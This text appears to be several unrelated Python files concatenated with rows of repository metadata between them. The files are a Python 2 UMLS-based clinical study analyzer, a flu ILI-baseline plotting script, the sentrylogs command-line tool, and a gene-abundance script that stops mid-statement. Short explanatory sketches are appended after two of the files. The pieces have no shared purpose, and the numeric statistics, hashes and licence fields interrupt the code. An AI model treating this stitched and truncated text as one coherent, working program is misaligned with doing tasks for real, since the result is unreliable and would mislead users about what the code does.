    def __init__(self, name, terms, umls_instance=None):
        self.terms = terms
        self._name = name
        self._term_to_concept = None
        self._concept_closure = None
        self._umls_instance = umls_instance

    def gen_concept_closure(self, term_concepts=None, concept_to_closure=None):
        """
        generate concept closures for all terms
        :param term_concepts: optional - expert verified mappings can be used
        :param concept_to_closure: precomputed concept to closure dictionary
        :return:
        """
        self._term_to_concept = {}
        self._concept_closure = set()
        if term_concepts is None:
            term_concepts = {}
            for term in self.terms:
                concept_objs = onto.match_term_to_concept(term if not term.startswith("~~") else term[2:])
                if concept_objs is not None:
                    term_concepts[term] = [o['localName'] for o in concept_objs]
        for term in term_concepts:
            candidate_terms = []
            for concept in term_concepts[term]:
                if concept_to_closure is not None:
                    candidate_terms.append((concept, concept_to_closure[concept]))
                else:
                    candidate_terms.append((concept, onto.get_transitive_subconcepts(concept)))
            # pick the richest sub-concept mapping
            if len(candidate_terms) > 1:
                candidate_terms = sorted(candidate_terms, key=lambda x: -len(x[1]))
            if term.startswith('~~'):
                to_remove = set(candidate_terms[0][1])
                to_remove.add(candidate_terms[0][0])
                self._concept_closure -= to_remove
                print 'removed %s items' % len(to_remove)
            else:
                self._concept_closure.add(candidate_terms[0][0])
                self._concept_closure |= set(candidate_terms[0][1])
            self._term_to_concept[term] = {'mapped': candidate_terms[0][0], 'closure': len(candidate_terms[0][1])}

    @staticmethod
    def compute_all_concept_closure(all_concepts, umls_instance, skip_relations={}):
        concept_to_closure = {}
        print 'all concepts number %s' % len(all_concepts)
        computed = []
        results = []
        utils.multi_thread_tasking(all_concepts, 40, StudyConcept.do_compute_concept_closure,
                                   args=[umls_instance, computed, results, skip_relations])
        for r in results:
            concept_to_closure[r['concept']] = r['closure']
        return concept_to_closure

    @staticmethod
    def do_compute_concept_closure(concept, umls_instance, computed, results, skip_relations={}):
        if concept not in computed:
            closure = umls_instance.transitive_narrower(concept, skip_relations=skip_relations)
            computed.append(concept)
            results.append({'concept': concept, 'closure': closure})
            print 'concept: %s transitive children %s' % (concept, closure)

    @property
    def name(self):
        return self._name

    @property
    def concept_closure(self):
        if self._concept_closure is None:
            self.gen_concept_closure()
        return self._concept_closure

    @concept_closure.setter
    def concept_closure(self, value):
        self._concept_closure = value

    @property
    def term_to_concept(self):
        if self._concept_closure is None:
            self.gen_concept_closure()
        return self._term_to_concept

    @term_to_concept.setter
    def term_to_concept(self, value):
        self._term_to_concept = value


class StudyAnalyzer(object):
    def __init__(self, name):
        self._study_name = name
        self._study_concepts = []
        self._skip_terms = []
        self._options = None

    @property
    def study_name(self):
        return self._study_name

    @study_name.setter
    def study_name(self, value):
        self._study_name = value

    @property
    def study_concepts(self):
        return self._study_concepts

    @study_concepts.setter
    def study_concepts(self, value):
        self._study_concepts = value

    @property
    def skip_terms(self):
        return self._skip_terms

    @skip_terms.setter
    def skip_terms(self, value):
        self._skip_terms = value

    def add_concept(self, concept):
        self.study_concepts.append(concept)

    def generate_exclusive_concepts(self):
        """
        it is important to have a set of disjoint concepts,
        otherwise concept-document frequencies would contain double-counted results
        :return:
        """
        # touch the concept_closure property first to make sure
        # the closure has been generated before computing the disjoint sets
        for sc in self.study_concepts:
            cc = sc.concept_closure
        intersections = {}
        explain_inter = {}
        for i in range(1, len(self.study_concepts)):
            for j in xrange(i):
                common = self.study_concepts[i].concept_closure & self.study_concepts[j].concept_closure
                if len(common) > 0:
                    intersections[self.study_concepts[i].name + ' - ' + self.study_concepts[j].name] = common
                    self.study_concepts[j].concept_closure -= common
                    explain_inter[self.study_concepts[j].name] = \
                        ['removed %s common (%s) concepts' % (len(common), self.study_concepts[i].name)] \
                        if self.study_concepts[j].name not in explain_inter \
                        else explain_inter[self.study_concepts[j].name] + \
                             ['removed %s common (%s) concepts' % (len(common), self.study_concepts[i].name)]
        # if len(intersections) > 0:
        #     print 'intersections [[\n%s\n]]' % json.dumps(explain_inter)
        #     for sc in self.study_concepts:
        #         print '%s %s' % (sc.name, len(sc.concept_closure))

    def remove_study_concept_by_name(self, concept_name):
        for sc in self.study_concepts:
            if sc.name == concept_name:
                self.study_concepts.remove(sc)

    def retain_study_concepts(self, concept_names):
        retained = []
        for sc in self.study_concepts:
            if sc.name in concept_names:
                retained.append(sc)
        self.study_concepts = retained

    def export_mapping_in_json(self):
        mapping = {}
        for c in self._study_concepts:
            mapping[c.name] = c.term_to_concept
        return mapping

    def serialise(self, out_file):
        print 'iterating concepts to populate the mappings'
        for c in self._study_concepts:
            tc = c.term_to_concept
        print 'saving...'
        jl.dump(self, out_file)
        print 'serialised to %s' % out_file

    @property
    def study_options(self):
        return self._options

    @study_options.setter
    def study_options(self, value):
        self._options = value

    @staticmethod
    def deserialise(ser_file):
        return jl.load(ser_file)

    def gen_study_table(self, cohort_name, out_file):
        cohort.populate_patient_study_table(cohort_name, self, out_file)

    def gen_sample_docs(self, cohort_name, out_file):
        cohort.random_extract_annotated_docs(cohort_name, self, out_file, 10)

    def gen_study_table_with_rules(self, cohort_name, out_file, sample_out_file, ruler, ruled_out_file,
                                   sql_config, db_conn_file, text_preprocessing=False):
        sql_setting = get_sql_template(sql_config)
        cohort.populate_patient_study_table_post_ruled(cohort_name, self, out_file, ruler, 20,
                                                       sample_out_file, ruled_out_file,
                                                       sql_setting['patients_sql'],
                                                       sql_setting['term_doc_anns_sql'],
                                                       sql_setting['skip_term_sql'], db_conn_file,
                                                       text_preprocessing=text_preprocessing)

    def gen_study_table_in_one_iteration(self, cohort_name, out_file, sample_out_file,
                                         sql_config, db_conn_file):
        sql_setting = get_one_iteration_sql_template(sql_config)
        cohort.generate_result_in_one_iteration(cohort_name, self, out_file, 20, sample_out_file,
                                                sql_setting['doc_to_brc_sql'], sql_setting['brc_sql'],
                                                sql_setting['anns_iter_sql'], sql_setting['skip_term_sql'],
                                                sql_setting['doc_content_sql'], db_conn_file)

    def gen_study_table_with_rules_es(self, cohort_name, out_file, sample_out_file, ruler, ruled_out_file,
                                      sem_idx_setting_file, retained_patients_filter, filter_obj=None):
        cohort.es_populate_patient_study_table_post_ruled(self, out_file, ruler, 20, sample_out_file,
                                                          ruled_out_file, sem_idx_setting_file,
                                                          retained_patients_filter=retained_patients_filter,
                                                          filter_obj=filter_obj)


def get_sql_template(config_file):
    root = ET.parse(config_file).getroot()
    return {'term_doc_anns_sql': root.find('term_doc_anns_sql').text,
            'patients_sql': root.find('patients_sql').text,
            'skip_term_sql': root.find('skip_term_sql').text}


def get_one_iteration_sql_template(config_file):
    root = ET.parse(config_file).getroot()
    return {'doc_to_brc_sql': root.find('doc_to_brc_sql').text,
            'brc_sql': root.find('brc_sql').text,
            'anns_iter_sql': root.find('anns_iter_sql').text,
            'doc_content_sql': root.find('doc_content_sql').text,
            'skip_term_sql': root.find('skip_term_sql').text}


def load_ruler(rule_setting_file):
    ruler = AnnRuleExecutor()
    if rule_setting_file is None:
        ruler.load_rule_config('./studies/rules/_default_rule_config.json')
    else:
        ruler.load_rule_config(rule_setting_file)
    return ruler


def load_study_settings(folder, umls_instance, rule_setting_file=None, concept_filter_file=None,
                        do_disjoint_computing=True, export_study_concept_only=False):
    p, fn = split(folder)
    if isfile(join(folder, 'study_analyzer.pickle')):
        sa = StudyAnalyzer.deserialise(join(folder, 'study_analyzer.pickle'))
    else:
        sa = StudyAnalyzer(fn)
    if isfile(join(folder, 'label2concept.tsv')):
        # using tsv file if it exists
        logging.info('loading study concepts from tsv file...')
        lines = utils.read_text_file(join(folder, 'label2concept.tsv'))
        scs = []
        for l in lines:
            arr = l.split('\t')
            if len(arr) != 2:
                logging.error('line [%s] not parsable' % l)
                continue
            t = arr[0]
            c = arr[1]
            sc = StudyConcept(t, [t])
            sc.concept_closure = set([c])
            tc = {}
            tc[t] = {'closure': 1, 'mapped': c}
            sc.term_to_concept = tc
            scs.append(sc)
            logging.debug('study concept [%s]: %s, %s' % (sc.name, sc.term_to_concept, sc.concept_closure))
        sa.study_concepts = scs
        logging.info('study concepts loaded')
    elif isfile(join(folder, 'exact_concepts_mappings.json')):
        concept_mappings = utils.load_json_data(join(folder, 'exact_concepts_mappings.json'))
        concept_to_closure = None
        # concept_to_closure = \
        #     StudyConcept.compute_all_concept_closure([concept_mappings[t] for t in concept_mappings],
        #                                              umls_instance, skip_relations=skip_closure_relations)
        scs = []
        for t in concept_mappings:
            sc = StudyConcept(t, [t])
            t_c = {}
            t_c[t] = [concept_mappings[t]]
            sc.gen_concept_closure(term_concepts=t_c, concept_to_closure=concept_to_closure)
            scs.append(sc)
            logging.debug(sc.concept_closure)
        sa.study_concepts = scs
        sa.serialise(join(folder, 'study_analyzer.pickle'))
    elif isfile(join(folder, 'manual_mapped_concepts.json')):
        mapped_scs = utils.load_json_data(join(folder, 'manual_mapped_concepts.json'))
        scs = []
        for t in mapped_scs:
            sc = StudyConcept(t, [t])
            sc.concept_closure = set(mapped_scs[t]['concepts'])
            tc = {}
            tc[t] = mapped_scs[t]['tc']
            sc.term_to_concept = tc
            scs.append(sc)
            logging.debug('study concept [%s]: %s, %s' % (sc.name, sc.term_to_concept, sc.concept_closure))
        sa.study_concepts = scs
    else:
        concepts = utils.load_json_data(join(folder, 'study_concepts.json'))
        if len(concepts) > 0:
            scs = []
            for name in concepts:
                scs.append(StudyConcept(name, concepts[name], umls_instance=umls_instance))
                logging.debug('%s, %s' % (name, concepts[name]))
            sa.study_concepts = scs
            sa.serialise(join(folder, 'study_analyzer.pickle'))

    # keep only filtered concepts, if a filter exists
    if concept_filter_file is not None:
        logging.debug('before removal, the concept length is: %s' % len(sa.study_concepts))
        concept_names = utils.load_json_data(concept_filter_file)
        sa.retain_study_concepts(concept_names)
        logging.debug('after removal: %s' % len(sa.study_concepts))

    # compute disjoint concepts
    if do_disjoint_computing:
        sa.generate_exclusive_concepts()
    if export_study_concept_only:
        sc2closure = {}
        for sc in sa.study_concepts:
            sc2closure[sc.name] = list(sc.concept_closure)
        utils.save_json_array(sc2closure, join(folder, 'sc2closure.json'))
        logging.debug('sc2closure.json generated in %s' % folder)
    if isfile(join(folder, 'study_options.json')):
        sa.study_options = utils.load_json_data(join(folder, 'study_options.json'))

    merged_mappings = {}
    study_concept_list = []
    for c in sa.study_concepts:
        for t in c.term_to_concept:
            all_concepts = list(c.concept_closure)
            study_concept_list += all_concepts
            if len(all_concepts) > 1:
                idx = 0
                for cid in all_concepts:
                    merged_mappings['(%s) %s (%s)' % (c.name, t, idx)] = {'closure': len(all_concepts),
                                                                          'mapped': cid}
                    idx += 1
            else:
                merged_mappings['(%s) %s' % (c.name, t)] = c.term_to_concept[t]
        # print c.name, c.term_to_concept, c.concept_closure
        # print json.dumps(list(c.concept_closure))
    # logging.debug('print merged mappings...')
    # print json.dumps(merged_mappings)
    # logging.debug(len(study_concept_list))
    utils.save_string('\n'.join(study_concept_list), join(folder, 'all_concepts.txt'))
    if export_study_concept_only:
        return
    # sa.gen_study_table(cohort_name, join(folder, 'result.csv'))
    # sa.gen_sample_docs(cohort_name, join(folder, 'sample_docs.json'))
    ruler = load_ruler(rule_setting_file)
    if len(ruler.skip_terms) > 0:
        sa.skip_terms = ruler.skip_terms
    return {'study_analyzer': sa, 'ruler': ruler}


def study(folder, cohort_name, sql_config_file, db_conn_file, umls_instance,
          do_one_iter=False, do_preprocessing=False, rule_setting_file=None,
          sem_idx_setting_file=None, concept_filter_file=None, retained_patients_filter=None,
          filter_obj_setting=None, do_disjoint_computing=True, export_study_concept_only=False,
          skip_closure_relations={}):
    ret = load_study_settings(folder, umls_instance,
                              rule_setting_file=rule_setting_file,
                              concept_filter_file=concept_filter_file,
                              do_disjoint_computing=do_disjoint_computing,
                              export_study_concept_only=export_study_concept_only)
    sa = ret['study_analyzer']
    ruler = ret['ruler']
    if do_one_iter:
        sa.gen_study_table_in_one_iteration(cohort_name, join(folder, 'result.csv'),
                                            join(folder, 'sample_docs.json'),
                                            sql_config_file, db_conn_file)
    else:
        if sem_idx_setting_file is None:
            sa.gen_study_table_with_rules(cohort_name, join(folder, 'result.csv'),
                                          join(folder, 'sample_docs.js'),
                                          ruler, join(folder, 'ruled_anns.json'),
                                          sql_config_file, db_conn_file,
                                          text_preprocessing=do_preprocessing)
        else:
            filter_obj = None
            if filter_obj_setting is not None:
                filter_obj = utils.load_json_data(filter_obj_setting)
            sa.gen_study_table_with_rules_es(cohort_name, join(folder, 'result.csv'),
                                             join(folder, 'sample_docs.js'),
                                             ruler, join(folder, 'ruled_anns.json'),
                                             sem_idx_setting_file, retained_patients_filter,
                                             filter_obj=filter_obj)
    logging.info('done')


def run_study(folder_path, no_sql_filter=None):
    study_config = 'study.json' if no_sql_filter is None else 'study_no_filter.json'
    if isfile(join(folder_path, study_config)):
        r = utils.load_json_data(join(folder_path, study_config))
        retained_patients = None
        if 'query_patients_file' in r:
            retained_patients = []
            lines = utils.read_text_file(r['query_patients_file'])
            for l in lines:
                arr = l.split('\t')
                retained_patients.append(arr[0])
        skip_closure_relations = {}
        if 'skip_closure_relations' in r:
            skip_closure_relations = utils.load_json_data(r['skip_closure_relations'])
        study(folder_path, r['cohort'], r['sql_config'], r['db_conn'],
              concept_mapping.get_umls_client_inst(r['umls_key']),
              do_preprocessing=r['do_preprocessing'],
              rule_setting_file=r['rule_setting_file'],
              do_one_iter=r['do_one_iter'],
              sem_idx_setting_file=None if 'sem_idx_setting_file' not in r else r['sem_idx_setting_file'],
              concept_filter_file=None if 'concept_filter_file' not in r else r['concept_filter_file'],
              retained_patients_filter=retained_patients,
              filter_obj_setting=None if 'filter_obj_setting' not in r else r['filter_obj_setting'],
              do_disjoint_computing=True if 'do_disjoint' not in r else r['do_disjoint'],
              export_study_concept_only=False if 'export_study_concept' not in r else r['export_study_concept'],
              skip_closure_relations=skip_closure_relations)
    else:
        logging.error('study.json not found in the folder')


if __name__ == "__main__":
    reload(sys)
    sys.setdefaultencoding('cp1252')
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    # expect exactly one or two arguments: STUDY_DIR plus an optional -no-sql-filter flag
    if len(sys.argv) < 2 or len(sys.argv) > 3:
        print 'the syntax is [python study_analyzer.py STUDY_DIR [-no-sql-filter]]'
    else:
        run_study(sys.argv[1], no_sql_filter=None if len(sys.argv) == 2 else 'yes')
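A minimal, self-contained sketch of the closure-picking rule in StudyConcept.gen_concept_closure: among a term's candidate concepts, the one with the largest transitive-subconcept closure wins, and terms prefixed with "~~" subtract their closure instead of adding it. The concept IDs and mappings below are made-up stand-ins for the ontology service.

candidates = {
    'heart failure': [('C001', {'C002', 'C003', 'C004'}), ('C009', {'C010'})],
    '~~right heart failure': [('C003', {'C004'})],
}
closure = set()
for term, concept_closures in candidates.items():
    # sort by descending closure size, as the original code does
    best_concept, best_closure = sorted(concept_closures, key=lambda x: -len(x[1]))[0]
    if term.startswith('~~'):
        closure -= best_closure | {best_concept}   # negated term: remove its closure
    else:
        closure |= best_closure | {best_concept}   # normal term: add its closure
print(closure)  # {'C001', 'C002'} -- C003/C004 removed by the negated term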
43.805616
121
0.601124
2,420
20,282
4.714876
0.115702
0.044435
0.034268
0.011919
0.375986
0.274759
0.198422
0.16284
0.143558
0.124189
0
0.003982
0.306528
20,282
462
122
43.900433
0.807252
0.047776
0
0.184987
0
0
0.097611
0.014777
0
0
0
0
0
0
null
null
0
0.032172
null
null
0.018767
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
8245cf950c7faf9f93224170dad96f903d0f0be0
2,603
py
Python
scripts/create_fluseverity_figs_v5/S_deltaILIpercent_time_CDCbaseline_v5.py
eclee25/flu-SDI-exploratory-age
2f5a4d97b84d2116e179e85fe334edf4556aa946
[ "MIT" ]
3
2018-03-29T23:02:43.000Z
2020-08-10T12:01:50.000Z
scripts/create_fluseverity_figs_v5/S_deltaILIpercent_time_CDCbaseline_v5.py
eclee25/flu-SDI-exploratory-age
2f5a4d97b84d2116e179e85fe334edf4556aa946
[ "MIT" ]
null
null
null
scripts/create_fluseverity_figs_v5/S_deltaILIpercent_time_CDCbaseline_v5.py
eclee25/flu-SDI-exploratory-age
2f5a4d97b84d2116e179e85fe334edf4556aa946
[ "MIT" ]
null
null
null
#!/usr/bin/python
##############################################
###Python template
###Author: Elizabeth Lee
###Date: 1/25/15
###Function: time series difference in ILI percentage from CDC-based ILI baseline calculation

###Import data: SQL_export/OR_allweeks_outpatient.csv, anydiag_allweeks_outpatient.csv

###Command Line: python S_deltaILIpercent_time_CDCbaseline_v5.py
##############################################

### notes ###
# Baseline is mean percentage of patient ILI visits during non-flu weeks for the previous 3 seasons plus 2 standard deviations. A non-flu week is a period of 2+ consecutive weeks where flu was <2% of the total number of specimens lab-confirmed for flu. (cdc.gov/flu/weekly/overview.htm)

### packages/modules ###
import csv
import matplotlib.pyplot as plt

## local modules ##
import functions_v5 as fxn

### data structures ###

### functions ###

### data files ###
ILIin = open('/home/elee/Dropbox/Elizabeth_Bansal_Lab/SDI_Data/explore/SQL_export/OR_allweeks_outpatient.csv', 'r')
ILIfile = csv.reader(ILIin, delimiter=',')
visitin = open('/home/elee/Dropbox/Elizabeth_Bansal_Lab/SDI_Data/explore/SQL_export/anydiag_allweeks_outpatient.csv', 'r')
visitin.readline()  # rm header
visitfile = csv.reader(visitin, delimiter=',')

### called/local plotting parameters ###
ps = fxn.pseasons
fw = fxn.gp_fluweeks
sl = fxn.gp_seasonlabels
colvec = fxn.gp_colors
wklab = fxn.gp_weeklabels
fs = 24
fssml = 16

### program ###
# dict_wk[wk] = seasonnum
# dict_ILIpercent[Thu date of week] = ILI as percent of total visits in that week (not a cumulative measure)
# dict_deltaILIpercent53ls[s] = [deltaILI percent wk 40, wk 41, ... wk 39]
# dict_refWeek[s] = date of reference week for that season
d_wk, d_ILIpercent = fxn.week_ILIpercent_processing(ILIfile, visitfile)
code = 'cdc'
d_cdcILIpercent53ls = fxn.ILIpercent_processing_CDCbaseline(d_wk, d_ILIpercent)

# plot delta ILI percent time series
for s in ps:
    plt.plot(xrange(53), d_cdcILIpercent53ls[s], marker=fxn.gp_marker, color=colvec[s-2],
             label=sl[s-2], linewidth=fxn.gp_linewidth)
plt.hlines([0], 0, 55, colors='k', linestyles='solid', linewidth=3)
plt.xlim([0, 52])
plt.xticks(range(53)[::5], wklab[::5])
plt.xlabel('Week Number', fontsize=fs)
plt.ylabel('delta ILI perc (ref %s)' % (code), fontsize=fs)
plt.legend(loc='upper right', prop={'size': 10})
plt.savefig('/home/elee/Dropbox/Elizabeth_Bansal_Lab/Manuscripts/Age_Severity/fluseverity_figs_v5/exploratory/new_baseline_definition/deltaILIpercent_time_ref%s.png' % (code), transparent=False, bbox_inches='tight', pad_inches=0)
plt.close()
# plt.show()
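A minimal sketch of the baseline definition quoted in the notes above: the mean ILI visit percentage across non-flu weeks of the previous seasons plus two standard deviations, then subtracted from each week's ILI percentage. The input arrays are made-up numbers, not SDI data.

import numpy as np

nonflu_ili_percent = np.array([1.1, 0.9, 1.3, 1.0, 1.2, 0.8])  # hypothetical non-flu weeks
baseline = nonflu_ili_percent.mean() + 2 * nonflu_ili_percent.std(ddof=1)
delta_ili = np.array([0.7, 1.5, 2.9, 3.4]) - baseline  # weekly ILI% minus baseline
print(round(baseline, 3), np.round(delta_ili, 3))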
40.046154
286
0.726854
379
2,603
4.852243
0.503958
0.016313
0.045677
0.039152
0.113105
0.113105
0.065253
0.065253
0.065253
0.065253
0
0.020241
0.107952
2,603
64
287
40.671875
0.771748
0.392624
0
0
0
0.035714
0.290254
0.242938
0
0
0
0
0
1
0
false
0
0.107143
0
0.107143
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8246faf773d4f1bfd0da404df98ee155653febc9
4,328
py
Python
sentrylogs/bin/sentrylogs.py
hossein/sentrylogs
70eaf665f9010ba2d8370ccc4013673bab7e2b16
[ "BSD-3-Clause" ]
32
2015-07-01T11:12:32.000Z
2021-09-04T23:58:27.000Z
sentrylogs/bin/sentrylogs.py
hossein/sentrylogs
70eaf665f9010ba2d8370ccc4013673bab7e2b16
[ "BSD-3-Clause" ]
37
2016-05-27T13:55:24.000Z
2022-02-24T14:55:58.000Z
sentrylogs/bin/sentrylogs.py
hossein/sentrylogs
70eaf665f9010ba2d8370ccc4013673bab7e2b16
[ "BSD-3-Clause" ]
15
2015-10-14T14:20:23.000Z
2021-12-03T08:49:15.000Z
#!/usr/bin/env python
"""Standalone script for Sentry Logs"""
from __future__ import print_function

import os
import argparse

try:
    from configparser import ConfigParser
except ImportError:  # Python 2.7
    from ConfigParser import ConfigParser  # pylint: disable=import-error

# Ignore warnings caused by ``sentrylogs.<...>`` imports
# pylint: disable=no-name-in-module


def get_command_line_args():
    """CLI command line arguments handling"""
    parser = argparse.ArgumentParser(description='Send logs to Django Sentry.')
    parser.add_argument('--sentryconfig', '-c', default=None,
                        help='A configuration file (.ini, .yaml) of some '
                             'Sentry integration to extract the Sentry DSN from')
    parser.add_argument('--sentrydsn', '-s', default="",
                        help='The Sentry DSN string (overrides -c)')
    parser.add_argument('--daemonize', '-d', default=False,
                        action='store_const', const=True,
                        help='Run this script in background')
    parser.add_argument('--follow', '-f', default="all",
                        help='Which logs to follow, default ALL')
    parser.add_argument('--nginxerrorpath', '-n', default=None,
                        help='Nginx error log path')
    parser.add_argument('--loglevel', '-l', default=None,
                        help='Minimum log level to send to sentry')
    return parser.parse_args()


def process_arguments(args):
    """Deal with arguments passed on the command line"""
    if args.sentryconfig:
        print('Parsing DSN from %s' % args.sentryconfig)
        os.environ['SENTRY_DSN'] = parse_sentry_configuration(args.sentryconfig)

    if args.sentrydsn:
        print('Using the DSN %s' % args.sentrydsn)
        os.environ['SENTRY_DSN'] = args.sentrydsn

    if ('SENTRY_DSN' not in os.environ) or (not os.environ['SENTRY_DSN']):
        raise SystemExit('No Sentry DSN found!')

    if args.nginxerrorpath:
        print('Using the Nginx error log path %s' % args.nginxerrorpath)
        os.environ['NGINX_ERROR_PATH'] = args.nginxerrorpath

    if args.loglevel:
        print('Using the sentry log level %s' % args.loglevel)
        os.environ['SENTRY_LOG_LEVEL'] = args.loglevel

    from ..conf import settings  # noqa: F401; pylint: disable=unused-import

    if args.daemonize:
        print('Running process in background')
        from ..daemonize import create_daemon
        create_daemon()


def parse_sentry_configuration(filename):
    """Parse Sentry DSN out of an application or Sentry configuration file"""
    filetype = os.path.splitext(filename)[-1][1:].lower()

    if filetype == 'ini':  # Pyramid, Pylons
        # pylint: disable=no-else-raise
        config = ConfigParser()
        config.read(filename)
        ini_key = 'dsn'
        ini_sections = ['sentry', 'filter:raven']
        for section in ini_sections:
            if section in config:
                print('- Using value from [{section}]:[{key}]'
                      .format(section=section, key=ini_key))
                try:
                    return config[section][ini_key]
                except KeyError:
                    print('- Warning: Key "{key}" not found in section '
                          '[{section}]'.format(section=section, key=ini_key))
        raise SystemExit('No DSN found in {file}. Tried sections [{sec_list}]'
                         .format(
                             file=filename,
                             sec_list='], ['.join(ini_sections),
                         ))
    elif filetype == 'py':  # Django, Flask, Bottle, ...
        raise SystemExit('Parsing configuration from pure Python (Django,'
                         'Flask, Bottle, etc.) not implemented yet.')

    raise SystemExit('Configuration file type not supported for parsing: '
                     '%s' % filetype)


def launch_log_parsers():
    """Run all log file parsers that send entries to Sentry"""
    from ..parsers.nginx import Nginx

    for parser in [Nginx]:
        parser().follow_tail()


def main():
    """Main entry point of console script"""
    args = get_command_line_args()
    process_arguments(args)
    print('Start sending %s logs to Sentry' % args.follow)
    launch_log_parsers()


if __name__ == '__main__':
    main()
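A small, self-contained sketch of the .ini lookup performed by parse_sentry_configuration: the DSN is read from the first matching section among ['sentry', 'filter:raven']. The DSN value below is made up.

from configparser import ConfigParser

cfg = ConfigParser()
cfg.read_string("""
[filter:raven]
dsn = https://key@sentry.example.com/1
""")
for section in ['sentry', 'filter:raven']:
    if section in cfg and 'dsn' in cfg[section]:
        print('DSN found in [%s]: %s' % (section, cfg[section]['dsn']))
        break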
37.310345
81
0.606978
495
4,328
5.191919
0.333333
0.028016
0.039689
0.021012
0.022568
0.022568
0
0
0
0
0
0.002236
0.276802
4,328
115
82
37.634783
0.81885
0.124307
0
0.024691
0
0
0.2506
0
0
0
0
0
0
1
0.061728
false
0
0.111111
0
0.197531
0.111111
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
412e848b7e0488d32c3276f0473edaef8c8bebb6
4,834
py
Python
scripts/figures/gene_abundance.py
vic-cheung/vectorseq
6f1aaeb3035c3c939b442e30076504ff84e43aa5
[ "MIT" ]
1
2022-03-30T19:56:43.000Z
2022-03-30T19:56:43.000Z
scripts/figures/gene_abundance.py
vic-cheung/vectorseq
6f1aaeb3035c3c939b442e30076504ff84e43aa5
[ "MIT" ]
null
null
null
scripts/figures/gene_abundance.py
vic-cheung/vectorseq
6f1aaeb3035c3c939b442e30076504ff84e43aa5
[ "MIT" ]
null
null
null
#%%
import scanpy as sc
import pandas as pd
from pathlib import Path
from vectorseq.utils import check_gene_abundance, create_dir
from vectorseq.marker_constants import BrainGenes

data_dir = Path("/spare_volume/vectorseq-data")
figure_save_dir = create_dir(data_dir / "gene_abundance")

#%% [markdown]
# ## Gene Abundance Table for Experiment: 3250, Brain Region: v1

#%%
experiment_id = "3250"
brain_region = "v1"
run_dir = data_dir / experiment_id / brain_region
all_cells_output_dir = create_dir(run_dir / "all_cells")
adata = sc.read_h5ad(all_cells_output_dir / "filter" / "adata.h5ad")

filtered_tg_list = [
    gene for gene in BrainGenes.TG_MARKERS if gene.upper() in adata.obs.columns
]
endogenous_genes_list = [
    "Snap25", "Rbfox3", "Slc17a6", "Camk2a", "Gad1", "Gad2", "Mog", "Flt1",
]
gene_list = filtered_tg_list + endogenous_genes_list

count_fractions_df = pd.DataFrame()
for gene in gene_list:
    temp = check_gene_abundance(adata, gene_of_interest=gene)
    if not temp.empty:
        count_fractions_df = count_fractions_df.append(
            pd.DataFrame.from_dict(
                {
                    "gene": gene,
                    "number_of_expressing_cells": temp.shape[0],
                    "number_of_reads": temp.goi_counts.sum(),
                    "abundance_in_expressing_cells": f"{round(temp.percent_count_goi.mean(),2)} +/- {round(temp.percent_count_goi.std(),2)}",
                },
                orient="index",
            ).T
        )
        print(f"{gene} detected.")
    else:
        print(f"{gene} not detected.")
count_fractions_df.set_index(keys="gene", drop=True, inplace=True)
count_fractions_df.to_csv(
    figure_save_dir / f"{experiment_id}_{brain_region}_all_cells_gene_abundance.csv"
)
# %%

#%% [markdown]
# ## Gene Abundance Table for Experiment: 3382, Brain Region: snr

#%%
experiment_id = "3382"
brain_region = "snr"
run_dir = data_dir / experiment_id / brain_region
all_cells_output_dir = create_dir(run_dir / "all_cells")
adata = sc.read_h5ad(all_cells_output_dir / "filter" / "adata.h5ad")

filtered_tg_list = [
    gene for gene in BrainGenes.TG_MARKERS if gene.upper() in adata.obs.columns
]
endogenous_genes_list = [
    "Snap25", "Rbfox3", "Slc17a6", "Camk2a", "Gad1", "Gad2", "Mog", "Flt1",
]
gene_list = filtered_tg_list + endogenous_genes_list

count_fractions_df = pd.DataFrame()
for gene in gene_list:
    temp = check_gene_abundance(adata, gene_of_interest=gene)
    if not temp.empty:
        count_fractions_df = count_fractions_df.append(
            pd.DataFrame.from_dict(
                {
                    "gene": gene,
                    "number_of_expressing_cells": temp.shape[0],
                    "number_of_reads": temp.goi_counts.sum(),
                    "abundance_in_expressing_cells": f"{round(temp.percent_count_goi.mean(),2)} +/- {round(temp.percent_count_goi.std(),2)}",
                },
                orient="index",
            ).T
        )
        print(f"{gene} detected.")
    else:
        print(f"{gene} not detected.")
count_fractions_df.set_index(keys="gene", drop=True, inplace=True)
count_fractions_df.to_csv(
    figure_save_dir / f"{experiment_id}_{brain_region}_all_cells_gene_abundance.csv"
)
# %%

#%% [markdown]
# ## Gene Abundance Table for Experiment: 3454, Brain Region: sc

#%%
data_dir = Path("/spare_volume/vectorseq-data")
experiment_id = "3454"
brain_region = "sc"
run_dir = data_dir / experiment_id / brain_region
all_cells_output_dir = create_dir(run_dir / "all_cells")
adata = sc.read_h5ad(all_cells_output_dir / "filter" / "adata.h5ad")

filtered_tg_list = [
    gene for gene in BrainGenes.TG_MARKERS if gene.upper() in adata.obs.columns
]
endogenous_genes_list = [
    "Snap25", "Rbfox3", "Slc17a6", "Camk2a", "Gad1", "Gad2", "Mog", "Flt1",
]
gene_list = filtered_tg_list + endogenous_genes_list

count_fractions_df = pd.DataFrame()
for gene in gene_list:
    temp = check_gene_abundance(adata, gene_of_interest=gene)
    if not temp.empty:
        count_fractions_df = count_fractions_df.append(
            pd.DataFrame.from_dict(
                {
                    "gene": gene,
                    "number_of_expressing_cells": temp.shape[0],
                    "number_of_reads": temp.goi_counts.sum(),
                    "abundance_in_expressing_cells": f"{round(temp.percent_count_goi.mean(),2)} +/- {round(temp.percent_count_goi.std(),2)}",
                },
                orient="index",
            ).T
        )
        print(f"{gene} detected.")
    else:
        print(f"{gene} not detected.")
count_fractions_df.set_index(keys="gene", drop=True, inplace=True)
count_fractions_df.to_csv(
    figure_save_dir / f"{experiment_id}_{brain_region}_all_cells_gene_abundance.csv"
)
#%%
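A runnable sketch of the per-gene summary row the loop above assembles, using made-up counts in place of check_gene_abundance/AnnData. The column names mirror the script; the numbers are arbitrary.

import pandas as pd

per_cell = pd.DataFrame({"goi_counts": [3, 1, 7], "percent_count_goi": [0.5, 0.2, 1.1]})
row = pd.DataFrame.from_dict(
    {
        "gene": "Snap25",
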